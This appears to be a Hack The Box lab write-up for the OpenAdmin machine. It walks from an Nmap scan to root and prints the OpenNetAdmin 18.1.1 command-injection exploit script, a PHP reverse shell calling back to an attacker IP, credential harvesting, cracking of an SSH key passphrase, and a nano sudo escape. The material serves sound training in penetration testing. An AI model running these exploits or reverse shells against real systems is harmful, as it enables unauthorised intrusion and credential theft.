It’s never too late to start.

Me, Myself and I

About OpenAdmin

In this post, I’m writing a write-up for the machine OpenAdmin from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

OpenAdmin is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold The Nmap scan has found two open ports: 22/tcp and 80/tcp. On the HTTP port with fuzzing the directories, I found a NetOpenAdmin portal that is running on version 18.1.1 which out of date and contains a Remote Code Execution vulnerability. By exploiting this Remote Code Execution vulnerability in OpenNetAdmin I get a reverse shell as the user www-data.

User By searching the contents of the PHP-files on the string passwd, I found a database password that is giving me SSH access on this box because this is the same password that is used for the user account, Jimmy. With the account of Jimmy, I got the privileges to access the directory var/www/internal. This directory contains a file main.php which is extracting the private key from the user Joanna. By requesting this file with curl through the port 52846/tcp, I have captured the private key of Joanne, after cracking the passphrase of this key, I was able to SSH into this box with the user account Joanna.

Root the privilege escalation to root is a very simple – and not realistic, IMO – escalation. However, the user account Joanna has access to /bin/nano /opt/priv with root privileges without the use of a password. By the use of GTFOBins, I was able to understand how to use this privilege of nano to break out the restricted area and gain root privileges.

Machine Info

Recon

Port scan with Nmap

I initially start a Nmap portscan and writes the output to openadmin.txt.

nmap -sC -sV -oA ./nmap/openadmin.txt 10.10.10.171

Results of the Nmap scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 22:09 CET
Nmap scan report for 10.10.10.171
Host is up (0.42s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds

I have found two open ports on this box:

22/tcp (SSH)
80/tcp (Apache Web Server)

Enumeration Web server

I start by enumerating the Web Server and visited the page http://10.10.10.171 in my browser and I landed on the Apache2 Ubuntu Default Webpage.

Nothing interesting here so far. I decided to use wfuzz as my first shot to try to find something interesting. I invoked this command.

wfuzz -c -w /usr/share/wordlists/wfuzz/general/common.txt --hc 404 http://10.10.10.171/FUZZ

Output:

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more i
nformation.                                                                     
********************************************************             
* Wfuzz 2.4 - The Web Fuzzer                           *                                                                                      
********************************************************                                                                                      
Target: http://10.10.10.171/FUZZ                                       
Total requests: 949                
===================================================================                                                                           
ID           Response   Lines    Word     Chars       Payload                                                                                 
===================================================================                                                                           
000000544:   301        9 L      28 W     312 Ch      "music"   
Total time: 30.44644                                                   
Processed Requests: 949                                                
Filtered Requests: 948                                                 
Requests/sec.: 31.16948

wfuzz has found the folder music. I have now changed the URL in the web browser to http://10.10.10.171/music and a new webpage shows up.

On the top right corner, there is a login and register button. The register button points me directly back to the homepage, so that’s not interesting. The login button sends me to the URL: http://10.10.10.171/ona. That’s interesting to me. I clicked on the login button and I get redirected to a new webpage.

I’m now on an OpenNetAdmin page. On the left side of the page, there is an information bulletin visible. It says:

'You are NOT on the latest release version
     Your version    = v18.1.1
     Latest version = Unable to determine
 
 Please DOWNLOAD the latest version.'

That’s interesting information. When the software got’s outdated. There is likely a vulnerability to exploit. I have got an initial foothold on the system.

Exploitation

Time to open the exploit-db. I invoked this command below, to search for an exploit that is applicable for this OpenNetAdmin software version.

searchsploit opennetadmin

The output.

----------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                       |  Path
                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                        | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                         | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                          | exploits/php/webapps/47691.sh
----------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

There is a known remote command execution vulnerability in OpenNetAdmin 18.1.1.

I have tried to use this exploit in Metasploit, but that’s not gonna working. I have to use this exploit manually without the help of Metasploit. I have copied the 47691.sh to my working directory.

cp /usr/share/exploitdb/exploits/php/webapps/47691.sh /home/htb/boxes/machines/openadmin/exploit

I performed a cat on the bash script 47691.sh to check what this script exactly is doing. This bash script has the following contents:

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

I need to specify the /ona/ URI to get this exploit working. I invoked this command and directly an ls:

./47691.sh 10.10.10.171/ona/
$ ls
config
config_dnld.php
dcm.php
images
include
index.php
local
login.php
logout.php
modules
plugins
winc
workspace_plugins

I have now a sort of shell, it is not a full shell. But I can execute some commands. I’m now with the privilege as www-data.

$ whoami
www-data
$ pwd
/opt/ona/www

Gaining Access

www-data

My Parrot OS machine has some default crafted reverse shells, from pentestmonkey, available. I copied the php-reverse-shell.php to my working directory:

cp /usr/share/webshells/php/php-reverse-shell.php .

To get this reverse shell working it needs some little modification. The $ip needs to be changed to my machine IP and the $port needs to be modified and changed the name to revshell.php. Easier to write it down.

$ip = '10.10.16.62';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

I need to drop the payload on the box. I used SimpleHTTPServer to transfer this payload to the box.

python -m SimpleHTTPServer 8000

On the box, I used the wget program to download the payload from my webserver to the remote machine.

get 10.10.16.62:8000/revshell.php

I started netcat with a listener port of 4444 with this command:

~$ netcat -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Everything is now set up to get a remote shell on this webserver. I only need to call my revshell.php from the box. I opened the web browser and launched my reverse shell by opening this webpage: http://10.10.10.171/ona/revshell.php. The website is loading the payload and keeps it running. This is visible by the fact that the web page keeps in a loading state. The revshell.php is launching.

I’ve got a reverse shell. There is an incoming connection.

~$ ncat -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:55110.
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 23:10:24 up 22 min,  7 users,  load average: 40.02, 32.64, 20.82
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jimmy    pts/0    10.10.14.153     22:48   17:03   0.03s  0.03s -bash
jimmy    pts/1    10.10.15.81      22:48    4:56   0.06s  0.06s -bash
joanna   pts/2    10.10.14.190     23:02    3:35   0.03s  0.00s sshd: joanna [priv] 
joanna   pts/3    10.10.15.94      22:49    2:40   0.12s  0.00s sshd: joanna [priv] 
jimmy    pts/4    10.10.15.100     22:50    0.00s  0.04s  0.04s -bash
jimmy    pts/5    10.10.15.56      23:10    8.00s  0.02s  0.02s -bash
jimmy    pts/7    10.10.14.203     23:02    1:12   0.02s  0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

I have now a shell as www-data. First I need to upgrade this little puppy to a full shell to a full shell. I invoked this command:

~$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@openadmin:/$

I have got now a full shell on this server.

Lateral Movement

Getting to user account Jimmy

After some poking around in the shell, I found two user home directories /home/jimmy and /home/joanna but I do not have permission to access their folders.

The default directory of the files for hosting a website is located in the /var/www folder. I decided to set this folder as my start folder the perform further enumeration to escalate to the user. cd /var/www and then an ls -al. And I see that the user account jimmy has access to the internal directory. There is also an HTML listed and that will be my next stop.

www-data@openadmin:/var/www$ ls -al
ls -al
total 16
drwxr-xr-x  4 root     root     4096 Nov 22 18:15 .
drwxr-xr-x 14 root     root     4096 Nov 21 14:08 ..
drwxr-xr-x  6 www-data www-data 4096 Nov 22 15:59 html
drwxrwx---  2 jimmy    internal 4096 Jan 16 18:39 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21 16:07 ona -> /opt/ona/www
www-data@openadmin:/var/www/html$ ls
ls
artwork  index.html  marga  music  ona  sierra

There are some websites listed. I have visited all of the websites and checked if there was some interesting information:

http://10.10.10.171/artwork
http://10.10.10.171/marga
http://10.10.10.171/sierra

For now, there is nothing interesting to find on those websites. I’m looking for a password. These websites contain needs configuration files with database connections. Usually, these configuration files have a .php extension. Maybe there is a password in some of these configuration files.

On further investigation, I see that the ona folder is pointing to another directory (some sort of hint?). This is noticeable and I will use this directory as root directory to speed up a further search with grep. I’ve tried some combinations of searches. And finally, I got a bite with the command below:

~$ grep -r --include="*.php" "passwd"
...
./include/adodb_sessions.inc.php: * does that sort of thing before it passes data to these functions.                                         
./config/auth_ldap.config.php://$conf['auth']['ldap']['bindpw']   = 'mysecretbindpassword';                                                   
./config/config.inc.php:// Think of it as a cache or an easy way to pass data around ;)                                                       
./dcm.php:// If no user name is passed in then use dcm.pl as the login name                                                                   
./dcm.php:// be careful as this currently does not require a password.                                                                        
./local/config/database_settings.inc.php:        'db_passwd' => 'n1nj4W4rri0R!',                                                              
./winc/display_domain_server.inc.php:    // It expects to be passed the domain name as domain= to the module                                  
./winc/app_plugin_list.inc.php://     call is made to display_list(), this time passing a search                                              
./winc/app_device_model_list.inc.php://     call is made to display_list(), this time passing a search                                        
./winc/display_domain.inc.php:    // extra stuff to pass to ws_plugins                                                                        
./winc/display_domain.inc.php:    // It expects to be passed the domain name as domain= to the module                                         
./winc/user_edit.inc.php:                    name="passwd"                                                                                    
./winc/user_edit.inc.php:                    type="password"                                                                                  
./winc/user_edit.inc.php:    if (!$form['id'] and !$form['passwd']) {    
...

I found the password n1nj4W4rri0R! I can now establish an SSH session with the user account jimmy in combination with this password.

~$ ssh [email protected]
[email protected]'s password:

I know that the user account jimmy has access to the directory /var/www/internal. I navigate to this directory cd /var/www/internal and read the PHP-files. I found something interesting in the file main.php.

Last login: Thu Jan 16 21:04:55 2020 from 10.10.14.112
jimmy@openadmin:~$ pwd
/home/jimmy
jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -al
total 28
drwxrwx--- 2 jimmy internal 4096 Jan 16 20:41 .
drwxr-xr-x 4 root  root     4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23 17:40 main.php
-rw-rw-r-- 1 jimmy jimmy    5492 Jan 16 19:28 php-reverse-shell.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$

This is the interesting part: $output = shell_exec(‘cat /home/joanna/.ssh/id_rsa’);. The result of this command got saved in $output and the output will be printed on the screen. I can open this webpage with curl. I have tried multiple times with curl to get some output, but receive only 404 error messages.

With the command netstat –all I can see all the ports that this server is listening to, and I found something interesting.

Active Internet connections (servers and established)                                                                                         
Proto Recv-Q Send-Q Local Address           Foreign Address         State                                                                     
tcp        0      0 localhost:52846         0.0.0.0:*               LISTEN                                                                    
tcp        0      0 localhost:domain        0.0.0.0:*               LISTEN                                                                    
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN                                                                    
tcp        0      0 localhost:mysql         0.0.0.0:*               LISTEN                                                                    
tcp        0      0 openadmin:47346         10.10.14.7:4444         ESTABLISHED                                                               
tcp        0      0 openadmin:ssh           10.10.14.36:33736       FIN_WAIT2                                                                 
tcp        0      0 openadmin:ssh           10.10.15.211:38424      TIME_WAIT                                                                 
tcp        0      0 openadmin:ssh           10.10.15.211:38422      TIME_WAIT     
...

This server is listening on a non-default port 52846. A quick search on Google shows me that there is no particular program using this port. It has been configured for some reason. I tried to use curl on this port from inside the box and this command was working for me, the output is an encrypted private RSA-key:

jimmy@openadmin: curl 127.0.0.1:52846/main.php                                                                                              
<pre>-----BEGIN RSA PRIVATE KEY-----                                                                                                          
Proc-Type: 4,ENCRYPTED                                                                                                                        
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>

I copied the key and pasted in a separate file on my localhost, I called the file id_rsa. Contents of this file:

From user account jimmy to joanna

I assume that this key is part of the password of the user account joanna. Let’s give this file to ssh2john, he is a hero in cracking these encrypted keys I invoked this command and got output:

~$ python ssh2john.py id_rsa
id_rsa:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c82
9550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f
25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b2915
47983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803d
d47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40
963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7
681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c4
3534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d896929
20e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af
16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa
254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac
7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f3751
2998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a24
6feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2
e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba
2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf48253
0c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559
eb56ac66fe021c3f88c2a1a484d62d602903793d10d

I placed this hash in a separate file and called this file id_hash.txt. And give this file to my big brother john:

john --wordlist=/usr/share/wordlists/rockyou.txt id_hash.txt

John has no problems by cracking this password:

Using default input encoding: UTF-8 
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (?)
1g 0:00:00:11 DONE (2020-01-17 21:50) 0.08361g/s 1199Kp/s 1199Kc/s 1199KC/sa6_123..*7¡Vamos!
Session completed

I got now the passphrase bloodninjas. Let’s try to create an SSH session.

~$ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Fri Jan 17 20:05:35 UTC 2020
  System load:  1.55              Processes:             180
  Usage of /:   49.0% of 7.81GB   Users logged in:       0
  Memory usage: 21%               IP address for ens160: 10.10.10.171
  Swap usage:   0%
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$

And I’m now having a shell for the user joanna!

joanna@openadmin:~$ ls
test.txt  user.txt
joanna@openadmin:~$ cat user.txt
c9b2cf07d40807e62af62660f0c81b5f
joanna@openadmin:~$

Got the user.txt!

Privilege Escalation

First, I checked which permissions does joanna have:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Joanna may run /bin/nano in /opt/priv with root permissions without the need of a password. After some searching on Google, I found this page: https://gtfobins.github.io/gtfobins/nano/. It’s possible to perform a privilege escalation by editing a file as root without the need for the root password.

There is a file test.txt in this directory. I opened this file by invoking sudo nano /bin/nano /opt/priv and then perform do a Read File ^R.

And then switch to Execute Command ^X and execute the command reset; sh 1>&0 2>&0.

and I’m root:

# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
2f907ed450b361b2c2bf4e8795d5b561

Apply the flag and this box is rooted!

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

Hack The Box Write-Up OpenAdmin - 10.10.10.171